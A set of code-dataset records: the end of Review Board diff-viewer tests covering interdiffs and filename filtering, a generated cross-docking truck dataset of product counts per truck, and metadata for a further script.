b' import fnmatch\n'
b' import os\n'
b' import re\n'
))
self.create_filediff(
diffset,
source_file='/newfile',
dest_file='/newfile',
source_revision='PRE-CREATION',
dest_detail='',
diff=(
b'diff --git a/new_file b/new_file\n'
b'new file mode 100644\n'
b'index 0000000..ac30bd4\n'
b'--- /dev/null\n'
b'+++ b/new_file\n'
b'@@ -0,0 +1 @@\n'
b'+This is a different version of this new file!\n'
))
response = self.client.get('/r/1/diff/1-2/')
# Useful for debugging any actual errors here.
if response.status_code != 200:
print('Error: %s' % response.context['error'])
print(response.context['trace'])
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['diff_context']['num_diffs'], 2)
files = response.context['files']
self.assertTrue(files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0]['depot_filename'], '/newfile')
self.assertIn('interfilediff', files[0])
def test_with_filenames_option(self):
"""Testing ReviewsDiffViewerView with ?filenames=..."""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff1 = self.create_filediff(diffset,
source_file='src/main/test.c',
dest_file='src/main/test.cpp')
filediff2 = self.create_filediff(diffset,
source_file='docs/README.txt',
dest_file='docs/README2.txt')
filediff3 = self.create_filediff(diffset,
source_file='test.txt',
dest_file='test.rst')
filediff4 = self.create_filediff(diffset,
source_file='/lib/lib.h',
dest_file='/lib/lib.h')
self.create_filediff(diffset,
source_file='unmatched',
dest_file='unmatched')
response = self.client.get(
local_site_reverse(
'view-diff-revision',
kwargs={
'review_request_id': review_request.display_id,
'revision': diffset.revision,
}),
{
'filenames': '*/test.cpp,*.txt,/lib/*',
})
self.assertEqual(response.status_code, 200)
files = response.context['files']
self.assertEqual({file_info['filediff'] for file_info in files},
{filediff1, filediff2, filediff3, filediff4})
def test_with_filenames_option_normalized(self):
"""Testing ReviewsDiffViewerView with ?filenames=... values normalized
"""
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff1 = self.create_filediff(diffset,
source_file='src/main/test.c',
dest_file='src/main/test.cpp')
filediff2 = self.create_filediff(diffset,
source_file='docs/README.txt',
dest_file='docs/README2.txt')
filediff3 = self.create_filediff(diffset,
source_file='test.txt',
dest_file='test.rst')
filediff4 = self.create_filediff(diffset,
source_file='/lib/lib.h',
dest_file='/lib/lib.h')
self.create_filediff(diffset,
source_file='unmatched',
dest_file='unmatched')
response = self.client.get(
local_site_reverse(
'view-diff-revision',
kwargs={
'review_request_id': review_request.display_id,
'revision': diffset.revision,
}),
{
'filenames': ' , , */test.cpp,,,*.txt,/lib/* ',
})
self.assertEqual(response.status_code, 200)
files = response.context['files']
self.assertEqual({file_info['filediff'] for file_info in files},
{filediff1, filediff2, filediff3, filediff4})
[previous record trailing columns: avg_line_length 38.739583 | max_line_length 79 | alphanum_fraction 0.482657 | remaining quality-signal metrics omitted]

[next record metadata]
hexsha: 48479527f2f2a80a022f033ccc8cbae00939af20 | size: 15,232 | ext: py | lang: Python
max_stars_repo_path: crossdock/problems/experiment/crossdock_75_125_20_25_25.py | max_stars_repo_name: krerkkiat/icpr-2019-public | head: f3023c009f3335ce58204a45c270cfeb6ef19367 | licenses: ["BSD-3-Clause"] | stars: null
max_issues_repo_path: crossdock/problems/experiment/crossdock_75_125_20_25_25.py | max_issues_repo_name: krerkkiat/icpr-2019-public | head: f3023c009f3335ce58204a45c270cfeb6ef19367 | licenses: ["BSD-3-Clause"] | issues: null
max_forks_repo_path: crossdock/problems/experiment/crossdock_75_125_20_25_25.py | max_forks_repo_name: krerkkiat/icpr-2019-public | head: f3023c009f3335ce58204a45c270cfeb6ef19367 | licenses: ["BSD-3-Clause"] | forks: null
"""
Cross-docking truck data.
This data is generated by a generate_dataset.py script.
Created: Feb 18, 2019 at 07:30:04 PM
Copyright (c) 2022, Krerkkiat Chusap
This source code is licensed under the BSD 3-Clause "New" or "Revised" License (see LICENSE for details).
"""
from pathlib import Path
# Problem data.
name = Path(__file__).stem
inbound_gate_count = 25
outbound_gate_count = 25
# Parameters used to generate this data.
number_of_total_product_types = 20
product_per_truck_rate = 0.35
possible_inbound_total_product = [250, 340]
# Truck data.
_inbound_truck_raw_data = [
[0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 67, 175, 0, 3, 0, 0, 0, 0, 0],
[0, 0, 21, 0, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 83, 0, 98, 0, 0, 0],
[0, 0, 0, 0, 4, 36, 96, 130, 0, 0, 0, 36, 0, 0, 0, 0, 0, 38, 0, 0],
[0, 0, 0, 0, 0, 50, 0, 0, 0, 17, 0, 7, 107, 0, 0, 0, 142, 0, 17, 0],
[0, 0, 0, 0, 0, 20, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 220],
[0, 0, 22, 175, 0, 0, 0, 0, 9, 0, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 71, 0, 0, 0, 0, 21, 0, 0, 11, 0, 0, 0, 0, 147, 0, 0],
[0, 0, 0, 0, 0, 6, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 43, 0, 197],
[146, 0, 0, 0, 8, 0, 0, 0, 0, 0, 11, 53, 0, 106, 0, 0, 0, 16, 0, 0],
[0, 0, 0, 0, 0, 91, 0, 0, 0, 130, 30, 0, 15, 0, 0, 50, 0, 24, 0, 0],
[0, 0, 77, 11, 0, 0, 0, 156, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0],
[0, 71, 0, 0, 0, 22, 0, 0, 50, 0, 0, 0, 0, 58, 25, 0, 114, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 61, 0, 0, 54, 0, 0, 0, 0, 106, 29, 0, 0],
[26, 56, 0, 0, 0, 0, 0, 0, 0, 0, 60, 0, 0, 0, 0, 0, 0, 108, 0, 0],
[0, 0, 0, 0, 78, 0, 0, 0, 0, 0, 0, 103, 88, 6, 56, 0, 0, 0, 9, 0],
[0, 0, 0, 22, 0, 0, 0, 0, 0, 8, 0, 0, 37, 0, 182, 0, 10, 81, 0, 0],
[0, 0, 57, 0, 0, 0, 0, 49, 0, 0, 87, 0, 0, 0, 0, 0, 0, 57, 0, 0],
[0, 0, 0, 0, 45, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 47],
[113, 0, 0, 0, 0, 158, 0, 0, 7, 17, 0, 0, 0, 45, 0, 0, 0, 0, 0, 0],
[5, 0, 0, 0, 0, 74, 77, 0, 0, 0, 0, 0, 0, 65, 118, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 41, 0, 0, 173, 0, 0, 9, 0, 0, 0, 0, 0, 27, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 122, 109, 0, 9, 0],
[7, 30, 0, 85, 45, 0, 127, 0, 0, 46, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 16, 0, 0, 0, 0, 0, 0, 145, 0, 61, 0, 0, 0, 60, 0, 13, 0, 0, 45],
[35, 0, 0, 0, 0, 125, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 84, 0],
[0, 0, 0, 39, 0, 0, 2, 0, 0, 0, 0, 0, 206, 0, 3, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 95, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 140, 0, 0],
[0, 51, 0, 92, 0, 0, 0, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 65, 0, 0],
[74, 0, 0, 81, 0, 64, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 91, 0, 0, 0, 0, 50, 0, 0, 46, 0, 0, 0, 0, 0, 0, 63, 0, 0],
[0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 18, 0, 64, 105, 0, 12, 106, 0],
[20, 5, 0, 0, 109, 0, 0, 0, 0, 0, 167, 0, 37, 0, 0, 2, 0, 0, 0, 0],
[8, 0, 0, 0, 60, 0, 185, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 57, 15, 0],
[0, 125, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 59, 0, 0, 0, 0, 61, 0, 0],
[6, 0, 0, 0, 0, 0, 0, 89, 0, 0, 9, 0, 0, 141, 0, 0, 32, 63, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 222, 2, 0, 14],
[57, 44, 0, 0, 144, 0, 0, 0, 0, 0, 0, 0, 76, 0, 0, 0, 9, 0, 0, 10],
[0, 0, 0, 0, 0, 119, 0, 0, 0, 49, 0, 0, 69, 37, 30, 0, 0, 0, 36, 0],
[0, 0, 0, 63, 16, 0, 0, 58, 111, 0, 0, 74, 0, 0, 0, 0, 18, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 34, 0, 0, 193, 1, 0, 0, 0, 0, 43, 27, 0, 42, 0],
[0, 49, 0, 30, 0, 0, 37, 0, 0, 0, 0, 0, 41, 0, 40, 0, 143, 0, 0, 0],
[0, 0, 126, 0, 0, 0, 0, 0, 0, 16, 0, 53, 0, 0, 0, 55, 0, 0, 0, 0],
[0, 0, 22, 0, 0, 0, 0, 46, 0, 0, 140, 0, 0, 0, 0, 0, 0, 0, 0, 42],
[106, 31, 0, 0, 0, 0, 26, 0, 0, 87, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[110, 0, 0, 0, 0, 0, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 24],
[0, 0, 0, 11, 0, 28, 15, 275, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 0],
[0, 0, 0, 48, 28, 73, 0, 0, 0, 0, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0],
[41, 120, 0, 0, 72, 0, 18, 0, 0, 0, 0, 44, 45, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 92, 0, 0, 0, 0, 0, 118, 0, 0, 0, 88, 28, 8, 0, 6, 0, 0],
[0, 0, 49, 0, 0, 0, 29, 8, 0, 135, 0, 0, 78, 41, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 161, 0, 0, 0, 0, 0, 0, 0, 41, 0, 7, 0, 0, 0, 0, 41, 0],
[0, 0, 0, 0, 57, 141, 0, 0, 0, 0, 0, 0, 39, 13, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 221, 43, 0, 0, 19, 0, 0, 0, 3, 0, 2, 0, 0, 52, 0, 0],
[0, 0, 107, 0, 0, 0, 0, 62, 18, 0, 0, 0, 22, 14, 0, 0, 117, 0, 0, 0],
[0, 0, 0, 2, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 227, 15, 0, 35, 30],
[0, 0, 64, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 0, 0, 111, 0, 0, 0],
[0, 0, 0, 0, 37, 61, 0, 115, 0, 0, 0, 0, 0, 0, 43, 0, 0, 0, 48, 36],
[0, 0, 0, 0, 39, 0, 91, 37, 0, 0, 0, 0, 0, 0, 79, 70, 24, 0, 0, 0],
[0, 48, 0, 24, 3, 0, 92, 0, 0, 0, 39, 0, 0, 0, 0, 0, 0, 134, 0, 0],
[5, 0, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 7, 0, 29, 152],
[0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 106, 0, 0, 50, 0],
[0, 0, 0, 0, 0, 36, 9, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 91, 0],
[0, 0, 0, 0, 0, 101, 0, 0, 0, 0, 32, 0, 11, 106, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 39, 0, 0, 121, 0, 0, 54, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0],
[0, 0, 0, 0, 0, 85, 29, 25, 0, 111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 6, 0, 8, 200, 0, 0, 0, 0, 7, 0, 0, 0, 0, 101, 0, 0, 0, 18, 0],
[0, 115, 0, 0, 0, 22, 0, 0, 0, 0, 0, 9, 0, 70, 15, 0, 0, 0, 109, 0],
[0, 0, 0, 0, 25, 0, 8, 91, 0, 0, 0, 0, 0, 0, 2, 0, 0, 68, 146, 0],
[0, 124, 0, 0, 0, 0, 0, 0, 91, 0, 0, 7, 0, 0, 0, 0, 0, 0, 28, 0],
[0, 0, 0, 0, 0, 0, 50, 0, 90, 0, 0, 0, 73, 0, 0, 0, 15, 6, 0, 106],
[0, 0, 13, 0, 238, 53, 0, 0, 0, 2, 0, 9, 0, 25, 0, 0, 0, 0, 0, 0],
[0, 0, 16, 0, 0, 0, 0, 181, 0, 52, 0, 0, 0, 0, 24, 19, 0, 0, 0, 48],
[0, 0, 0, 0, 0, 51, 0, 0, 0, 17, 0, 0, 91, 0, 0, 0, 0, 91, 0, 0],
[0, 0, 83, 116, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4],
[0, 0, 0, 0, 0, 21, 0, 8, 0, 94, 0, 0, 82, 19, 0, 0, 0, 116, 0, 0],
]
_outbound_truck_raw_data = [
[9, 0, 4, 4, 2, 1, 3, 26, 0, 1, 5, 8, 31, 2, 13, 7, 4, 1, 0, 21],
[1, 0, 3, 16, 2, 3, 2, 29, 2, 1, 0, 6, 1, 5, 2, 18, 7, 5, 4, 10],
[6, 11, 14, 1, 33, 0, 7, 17, 6, 16, 3, 3, 6, 6, 2, 13, 0, 4, 0, 3],
[2, 3, 2, 20, 10, 7, 9, 12, 1, 5, 2, 12, 9, 1, 11, 7, 3, 7, 13, 8],
[5, 8, 5, 2, 6, 9, 9, 6, 36, 18, 2, 3, 10, 10, 3, 0, 3, 15, 20, 17],
[0, 2, 3, 25, 39, 12, 22, 4, 16, 6, 3, 7, 34, 12, 13, 19, 3, 3, 2, 16],
[5, 9, 8, 26, 37, 1, 15, 18, 15, 15, 3, 11, 1, 9, 7, 0, 27, 13, 5, 8],
[0, 10, 16, 4, 10, 36, 10, 23, 4, 28, 41, 0, 4, 6, 5, 3, 5, 6, 2, 1],
[14, 0, 11, 10, 22, 0, 2, 20, 6, 7, 3, 6, 6, 6, 4, 11, 15, 1, 1, 10],
[10, 6, 0, 4, 18, 7, 7, 5, 9, 3, 1, 1, 18, 13, 9, 3, 3, 6, 1, 2],
[1, 1, 6, 1, 35, 5, 17, 12, 1, 19, 5, 10, 11, 6, 10, 1, 3, 12, 1, 5],
[6, 7, 16, 13, 7, 8, 3, 0, 4, 9, 0, 2, 22, 19, 4, 1, 8, 4, 3, 4],
[10, 7, 5, 2, 9, 35, 2, 14, 3, 11, 3, 8, 22, 4, 17, 48, 23, 14, 9, 3],
[3, 20, 5, 16, 28, 6, 1, 0, 5, 2, 9, 1, 4, 1, 1, 3, 6, 26, 1, 7],
[13, 2, 6, 8, 17, 3, 21, 7, 8, 5, 3, 6, 33, 1, 2, 4, 1, 3, 4, 13],
[5, 10, 8, 9, 1, 14, 7, 7, 6, 31, 10, 4, 30, 7, 12, 26, 19, 6, 1, 13],
[7, 3, 8, 9, 12, 16, 24, 20, 4, 1, 14, 16, 4, 3, 4, 9, 5, 3, 28, 4],
[20, 8, 18, 0, 17, 0, 23, 0, 8, 5, 3, 4, 4, 2, 4, 7, 14, 9, 15, 9],
[8, 5, 29, 0, 20, 30, 10, 8, 0, 37, 22, 6, 5, 1, 2, 6, 13, 23, 1, 7],
[0, 4, 1, 3, 5, 13, 4, 47, 2, 1, 2, 2, 0, 0, 1, 3, 15, 15, 6, 0],
[9, 1, 2, 27, 0, 6, 11, 5, 1, 15, 4, 4, 2, 10, 16, 19, 8, 5, 4, 10],
[3, 10, 7, 1, 18, 21, 18, 10, 4, 8, 4, 10, 26, 22, 20, 9, 1, 52, 18, 8],
[4, 6, 7, 6, 32, 13, 2, 12, 15, 34, 1, 15, 10, 8, 10, 0, 1, 2, 14, 24],
[10, 2, 8, 12, 9, 25, 11, 14, 5, 1, 7, 8, 19, 1, 5, 5, 26, 19, 18, 24],
[5, 1, 8, 11, 7, 6, 16, 35, 1, 4, 13, 6, 17, 6, 1, 2, 3, 14, 5, 7],
[1, 4, 17, 10, 12, 1, 3, 0, 2, 7, 7, 1, 10, 1, 9, 10, 13, 15, 7, 4],
[8, 20, 14, 20, 9, 2, 7, 4, 4, 12, 1, 13, 15, 10, 5, 14, 1, 6, 14, 15],
[11, 16, 10, 1, 16, 1, 5, 0, 0, 3, 1, 3, 35, 10, 7, 5, 10, 5, 4, 5],
[4, 8, 3, 15, 4, 1, 1, 5, 26, 3, 5, 2, 16, 2, 1, 1, 0, 18, 4, 10],
[5, 19, 28, 6, 7, 22, 1, 10, 6, 6, 2, 6, 8, 3, 4, 3, 47, 15, 2, 1],
[3, 4, 6, 37, 14, 1, 10, 36, 2, 3, 1, 2, 8, 17, 5, 8, 10, 2, 2, 7],
[2, 7, 17, 51, 50, 16, 2, 3, 16, 19, 2, 2, 20, 0, 2, 4, 15, 4, 4, 4],
[1, 6, 6, 5, 4, 6, 2, 0, 7, 8, 1, 3, 7, 0, 5, 9, 10, 19, 14, 0],
[26, 0, 1, 7, 2, 14, 2, 8, 7, 16, 3, 1, 2, 1, 21, 1, 28, 2, 0, 7],
[10, 9, 5, 11, 12, 10, 10, 12, 19, 12, 2, 13, 16, 3, 0, 8, 6, 8, 1, 5],
[10, 8, 1, 3, 27, 9, 7, 10, 21, 29, 1, 6, 22, 5, 12, 6, 7, 27, 2, 13],
[8, 11, 5, 0, 23, 9, 5, 4, 1, 25, 0, 3, 5, 0, 3, 11, 2, 20, 2, 16],
[8, 2, 8, 6, 13, 42, 47, 10, 10, 1, 2, 30, 4, 4, 6, 6, 2, 33, 18, 9],
[0, 31, 6, 2, 19, 1, 5, 15, 5, 1, 11, 1, 37, 3, 1, 2, 1, 4, 5, 15],
[2, 12, 27, 7, 18, 13, 4, 2, 3, 9, 19, 2, 5, 3, 10, 1, 34, 3, 3, 6],
[2, 2, 3, 8, 7, 4, 39, 6, 1, 1, 14, 1, 2, 9, 9, 25, 14, 18, 7, 2],
[3, 45, 1, 2, 1, 5, 9, 1, 3, 1, 20, 3, 12, 3, 6, 4, 9, 7, 35, 2],
[2, 8, 2, 9, 12, 0, 6, 2, 0, 0, 10, 8, 0, 4, 2, 6, 4, 17, 21, 9],
[1, 8, 0, 24, 5, 1, 5, 8, 2, 1, 1, 9, 13, 11, 12, 2, 1, 11, 3, 19],
[1, 21, 4, 16, 7, 65, 28, 22, 5, 3, 4, 10, 23, 5, 6, 11, 6, 8, 6, 4],
[1, 12, 0, 6, 3, 0, 8, 25, 0, 14, 7, 9, 0, 14, 2, 2, 0, 21, 3, 2],
[3, 7, 16, 1, 1, 1, 1, 11, 0, 4, 0, 5, 21, 2, 15, 9, 1, 8, 13, 3],
[2, 9, 26, 0, 2, 15, 19, 22, 1, 12, 6, 2, 5, 6, 13, 15, 19, 4, 13, 27],
[8, 15, 1, 22, 4, 40, 18, 18, 9, 2, 8, 3, 23, 34, 3, 2, 10, 3, 11, 2],
[1, 9, 4, 4, 2, 1, 2, 9, 7, 14, 0, 15, 0, 7, 44, 5, 15, 39, 17, 8],
[6, 20, 3, 2, 10, 4, 2, 1, 1, 10, 14, 2, 8, 6, 1, 2, 4, 12, 0, 15],
[12, 6, 13, 13, 24, 0, 3, 1, 8, 6, 0, 1, 20, 6, 9, 6, 7, 43, 1, 2],
[3, 1, 3, 4, 4, 29, 9, 3, 2, 26, 3, 4, 2, 2, 3, 4, 10, 4, 10, 8],
[3, 15, 3, 8, 0, 50, 26, 15, 2, 33, 11, 0, 0, 7, 13, 4, 25, 2, 3, 3],
[12, 6, 8, 1, 20, 7, 15, 10, 11, 1, 1, 12, 38, 4, 5, 0, 22, 4, 2, 4],
[2, 4, 5, 3, 3, 1, 8, 2, 6, 19, 1, 3, 6, 0, 1, 1, 10, 6, 5, 3],
[2, 2, 15, 3, 31, 0, 2, 6, 1, 25, 1, 2, 4, 4, 30, 10, 21, 15, 21, 5],
[1, 13, 1, 7, 1, 5, 14, 4, 11, 8, 7, 6, 23, 3, 0, 2, 7, 7, 6, 14],
[0, 17, 3, 1, 2, 15, 5, 2, 7, 10, 0, 1, 32, 2, 18, 7, 28, 1, 1, 6],
[3, 13, 15, 7, 13, 4, 17, 17, 11, 10, 3, 6, 20, 24, 10, 1, 7, 3, 25, 6],
[2, 8, 8, 9, 7, 2, 15, 25, 3, 1, 1, 13, 7, 8, 2, 2, 10, 11, 2, 25],
[21, 21, 4, 18, 13, 24, 1, 22, 4, 9, 3, 1, 7, 7, 13, 19, 13, 16, 1, 2],
[3, 1, 16, 3, 5, 19, 14, 7, 3, 36, 12, 1, 24, 7, 6, 1, 10, 6, 2, 20],
[1, 7, 6, 1, 37, 3, 3, 18, 5, 35, 10, 3, 1, 7, 2, 7, 5, 13, 2, 3],
[4, 1, 11, 0, 15, 9, 0, 13, 17, 2, 1, 1, 6, 14, 1, 1, 8, 1, 7, 4],
[9, 1, 1, 10, 12, 19, 1, 9, 6, 13, 2, 2, 9, 14, 1, 18, 9, 36, 4, 2],
[16, 5, 1, 19, 6, 7, 7, 26, 6, 4, 4, 5, 4, 1, 3, 11, 37, 7, 6, 1],
[3, 4, 14, 1, 2, 68, 8, 6, 3, 4, 1, 13, 3, 18, 6, 7, 15, 3, 1, 15],
[8, 7, 13, 6, 9, 7, 22, 6, 1, 2, 4, 7, 8, 5, 1, 14, 1, 5, 4, 10],
[6, 5, 6, 10, 2, 11, 15, 7, 2, 7, 2, 4, 8, 6, 9, 3, 17, 1, 9, 6],
[7, 1, 1, 17, 6, 5, 3, 9, 18, 16, 8, 6, 2, 23, 43, 10, 1, 8, 1, 1],
[1, 4, 1, 7, 28, 69, 21, 30, 4, 10, 0, 4, 5, 4, 3, 1, 20, 3, 5, 22],
[1, 1, 9, 4, 1, 7, 2, 3, 12, 1, 2, 6, 2, 4, 1, 7, 1, 17, 13, 0],
[3, 4, 2, 19, 0, 13, 4, 41, 8, 0, 8, 7, 20, 10, 4, 5, 9, 13, 2, 2],
[12, 5, 3, 20, 8, 4, 29, 11, 31, 5, 2, 1, 31, 12, 33, 9, 7, 2, 4, 0],
[8, 0, 13, 28, 14, 13, 32, 10, 6, 3, 1, 7, 1, 28, 4, 3, 16, 33, 4, 18],
[24, 3, 17, 7, 1, 31, 6, 26, 3, 0, 1, 22, 0, 11, 2, 10, 0, 5, 7, 1],
[6, 1, 0, 1, 23, 20, 14, 18, 7, 34, 9, 9, 13, 2, 1, 17, 4, 15, 10, 0],
[6, 6, 4, 25, 18, 17, 22, 2, 0, 46, 7, 5, 0, 3, 4, 4, 29, 0, 7, 25],
[3, 4, 0, 14, 9, 13, 6, 7, 2, 22, 7, 9, 20, 0, 4, 6, 1, 21, 10, 23],
[2, 9, 2, 7, 0, 37, 1, 9, 1, 3, 3, 4, 1, 1, 39, 5, 3, 12, 5, 4],
[12, 1, 4, 7, 2, 8, 11, 9, 11, 26, 5, 3, 23, 15, 26, 0, 1, 6, 34, 3],
[3, 4, 5, 1, 13, 22, 4, 9, 4, 1, 4, 3, 9, 7, 7, 2, 11, 15, 0, 13],
[8, 1, 13, 6, 4, 2, 3, 9, 1, 31, 0, 6, 11, 22, 18, 0, 3, 9, 2, 4],
[0, 3, 4, 5, 19, 0, 5, 33, 0, 13, 5, 1, 0, 7, 1, 3, 3, 2, 6, 2],
[19, 1, 7, 3, 4, 14, 24, 4, 18, 2, 21, 0, 1, 5, 9, 0, 3, 1, 7, 1],
[7, 14, 1, 14, 11, 1, 12, 15, 1, 40, 1, 12, 6, 10, 8, 4, 1, 11, 0, 1],
[3, 9, 2, 17, 13, 0, 5, 5, 6, 31, 5, 4, 2, 2, 30, 2, 14, 24, 0, 13],
[9, 8, 12, 20, 14, 27, 15, 14, 17, 3, 23, 2, 18, 11, 10, 1, 19, 9, 8, 27],
[3, 11, 12, 6, 2, 9, 10, 3, 1, 3, 1, 9, 11, 1, 2, 8, 33, 32, 9, 18],
[24, 4, 4, 21, 8, 43, 21, 25, 1, 9, 12, 0, 12, 3, 23, 22, 59, 13, 19, 7],
[1, 0, 17, 0, 16, 12, 6, 10, 1, 17, 0, 14, 1, 7, 3, 11, 5, 41, 11, 6],
[6, 11, 10, 15, 3, 9, 1, 5, 2, 1, 7, 3, 8, 5, 3, 10, 31, 0, 16, 21],
[5, 0, 3, 10, 19, 14, 15, 3, 3, 4, 1, 6, 0, 1, 0, 0, 1, 3, 13, 5],
[8, 4, 25, 4, 5, 14, 22, 0, 20, 6, 11, 0, 16, 25, 2, 1, 10, 12, 20, 0],
[3, 12, 5, 2, 24, 6, 9, 0, 0, 14, 12, 5, 1, 33, 5, 2, 11, 39, 3, 3],
[8, 5, 7, 8, 12, 6, 5, 18, 8, 8, 0, 3, 3, 2, 32, 3, 5, 5, 3, 2],
[4, 5, 24, 5, 2, 15, 5, 12, 2, 32, 3, 2, 17, 5, 2, 1, 1, 9, 24, 1],
[1, 5, 7, 3, 13, 21, 7, 3, 5, 1, 7, 1, 37, 3, 1, 0, 11, 8, 11, 0],
[6, 4, 3, 12, 20, 10, 0, 1, 6, 12, 0, 6, 9, 6, 2, 11, 9, 2, 1, 0],
[19, 6, 6, 2, 27, 13, 34, 2, 3, 3, 8, 2, 5, 7, 9, 11, 6, 23, 2, 8],
[5, 1, 6, 6, 31, 1, 14, 1, 18, 1, 6, 1, 3, 3, 2, 3, 13, 3, 9, 0],
[1, 5, 8, 18, 20, 6, 6, 2, 12, 11, 1, 28, 27, 5, 5, 18, 38, 11, 5, 3],
[6, 7, 6, 6, 15, 13, 4, 15, 8, 8, 1, 0, 1, 4, 3, 0, 37, 38, 3, 6],
[5, 10, 6, 7, 17, 18, 12, 7, 10, 3, 4, 15, 24, 4, 5, 7, 10, 4, 0, 4],
[12, 9, 1, 2, 4, 5, 9, 18, 0, 16, 6, 4, 1, 5, 2, 0, 11, 9, 4, 5],
[1, 10, 0, 7, 5, 10, 14, 5, 14, 15, 8, 4, 16, 9, 13, 18, 4, 6, 19, 2],
[6, 4, 15, 15, 4, 10, 40, 18, 6, 19, 3, 4, 4, 19, 6, 0, 16, 7, 0, 4],
[7, 4, 2, 1, 5, 53, 10, 6, 1, 18, 2, 9, 4, 2, 18, 3, 3, 8, 3, 2],
[26, 2, 2, 9, 0, 3, 5, 14, 26, 8, 15, 7, 4, 1, 9, 15, 8, 9, 2, 0],
[12, 4, 4, 13, 24, 17, 5, 28, 8, 4, 16, 6, 3, 6, 4, 12, 5, 19, 2, 8],
[3, 6, 13, 18, 13, 6, 3, 13, 1, 2, 3, 0, 6, 2, 4, 15, 19, 39, 0, 0],
[10, 6, 6, 3, 14, 4, 10, 4, 16, 5, 3, 0, 50, 6, 2, 17, 3, 6, 6, 3],
[8, 0, 3, 13, 1, 14, 4, 16, 2, 9, 4, 4, 6, 10, 3, 4, 1, 22, 12, 5],
[1, 1, 2, 30, 19, 11, 7, 11, 2, 9, 2, 1, 26, 12, 27, 2, 3, 3, 18, 4],
[2, 15, 2, 20, 8, 4, 9, 15, 0, 5, 4, 16, 4, 9, 5, 2, 2, 24, 3, 8],
[1, 13, 6, 17, 11, 4, 6, 10, 14, 2, 16, 7, 19, 1, 6, 5, 27, 8, 19, 43],
[10, 18, 4, 10, 16, 0, 8, 26, 8, 8, 0, 6, 7, 12, 8, 11, 28, 35, 34, 7],
[8, 6, 34, 2, 9, 2, 11, 0, 6, 15, 11, 4, 13, 9, 5, 1, 8, 13, 1, 5],
[10, 1, 3, 5, 14, 0, 1, 21, 10, 7, 1, 13, 35, 2, 3, 12, 11, 5, 1, 19],
[0, 2, 15, 6, 11, 40, 4, 15, 0, 16, 2, 2, 12, 10, 1, 4, 32, 9, 7, 24],
[2, 16, 4, 0, 3, 5, 6, 2, 17, 2, 3, 0, 18, 8, 1, 5, 8, 9, 16, 6],
[2, 13, 1, 20, 20, 30, 9, 7, 10, 3, 13, 0, 6, 19, 1, 32, 2, 5, 14, 2],
[3, 1, 19, 0, 7, 39, 10, 29, 1, 18, 6, 0, 2, 19, 19, 4, 24, 2, 1, 1],
[0, 5, 0, 8, 4, 12, 0, 15, 3, 1, 7, 1, 2, 2, 6, 2, 6, 18, 5, 0],
]
# Derived data.
inbound_truck_count = len(_inbound_truck_raw_data)
outbound_truck_count = len(_outbound_truck_raw_data)
total_truck_count = inbound_truck_count + outbound_truck_count
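# Hedged sketch (not part of the generated data file): a quick consistency
# check one might run over the raw matrices, assuming every inner list is one
# truck and every column is one of the number_of_total_product_types products.
#
#   def _row_widths_ok(rows):
#       return all(len(row) == number_of_total_product_types for row in rows)
#
#   assert _row_widths_ok(_inbound_truck_raw_data)
#   assert _row_widths_ok(_outbound_truck_raw_data)
#   print(total_truck_count, sum(sum(row) for row in _inbound_truck_raw_data))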
[previous record trailing columns: avg_line_length 65.094017 | max_line_length 100 | alphanum_fraction 0.385045 | remaining quality-signal metrics omitted]

[next record metadata]
hexsha: 6f93964eaddfac091be90688ba81287806d78337 | size: 5,530 | ext: py | lang: Python
max_stars_repo_path: POA/scripts/tfidf.py | max_stars_repo_name: ashyseer/COVID-19ServiceWebsite | head: 2eacb445a947c3004542ac3f87a5a88b12ab292d | licenses: ["Apache-2.0"] | stars: 1 (2020-07-15T06:37:25.000Z)
max_issues_repo_path: POA/scripts/tfidf.py | max_issues_repo_name: ashyseer/COVID-19ServiceWebsite | head: 2eacb445a947c3004542ac3f87a5a88b12ab292d | licenses: ["Apache-2.0"] | issues: null
